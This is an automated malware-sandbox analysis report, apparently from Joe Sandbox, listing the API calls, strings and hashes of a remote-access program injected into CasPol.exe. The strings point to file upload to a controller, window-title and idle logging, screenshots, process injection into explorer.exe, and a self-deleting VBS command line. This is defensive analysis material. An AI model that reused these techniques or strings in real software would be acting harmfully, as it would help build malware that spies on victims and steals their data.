                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                            • API String ID: 2490988753-744132762
                                                                                                            • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                            • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                            • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                            • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumOpen
                                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                            • API String ID: 1332880857-3714951968
                                                                                                            • Opcode ID: f46f1a9284f9aadb95e313cfc30b4f0416f7e9dd0f09b0a54e2c892f2b19f8df
                                                                                                            • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                            • Opcode Fuzzy Hash: f46f1a9284f9aadb95e313cfc30b4f0416f7e9dd0f09b0a54e2c892f2b19f8df
                                                                                                            • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                            • String ID: Close
                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$Info
                                                                                                            • String ID:
                                                                                                            • API String ID: 2509303402-0
                                                                                                            • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                            • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                            • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                            • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                            • Opcode ID: 3ccb7c67a34d97c7a1d2f7c16334c5644f3cdcc407d07e35d92dbabba6a1fd4e
                                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                            • Opcode Fuzzy Hash: 3ccb7c67a34d97c7a1d2f7c16334c5644f3cdcc407d07e35d92dbabba6a1fd4e
                                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                            • Opcode ID: ee6ca423a3e12f131acdf7c7063f067e3c90c3dd4c23d2ba82e05310d5c23a6f
                                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                            • Opcode Fuzzy Hash: ee6ca423a3e12f131acdf7c7063f067e3c90c3dd4c23d2ba82e05310d5c23a6f
                                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                                            • _free.LIBCMT ref: 00450136
                                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                                            • _free.LIBCMT ref: 00450175
                                                                                                            • _free.LIBCMT ref: 00450192
                                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                            • API String ID: 489098229-65789007
                                                                                                            • Opcode ID: e5b4c5c08f955cc3e65d7152bc7056668d80937632c53f076a10592495d31ca6
                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                            • Opcode Fuzzy Hash: e5b4c5c08f955cc3e65d7152bc7056668d80937632c53f076a10592495d31ca6
                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                            • API String ID: 1913171305-390638927
                                                                                                            • Opcode ID: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                            • Opcode Fuzzy Hash: 222c1658ba95736b802eee0df1c967450302ea47f021d80fb4b35919c33a7236
                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                            • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                                            • API String ID: 911427763-3954389425
                                                                                                            • Opcode ID: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                            • Opcode Fuzzy Hash: 857cb8547fc0c7de63d47fafe1f939e9c3f12b23128d66a6f39a65a77907db43
                                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 65535$udp
                                                                                                            • API String ID: 0-1267037602
                                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                                            • _free.LIBCMT ref: 00439471
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441525078-0
                                                                                                            • Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                            • Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                            • API String ID: 2956720200-749203953
                                                                                                            • Opcode ID: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                            • Opcode Fuzzy Hash: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                            • Opcode ID: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                            • Opcode Fuzzy Hash: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess
                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
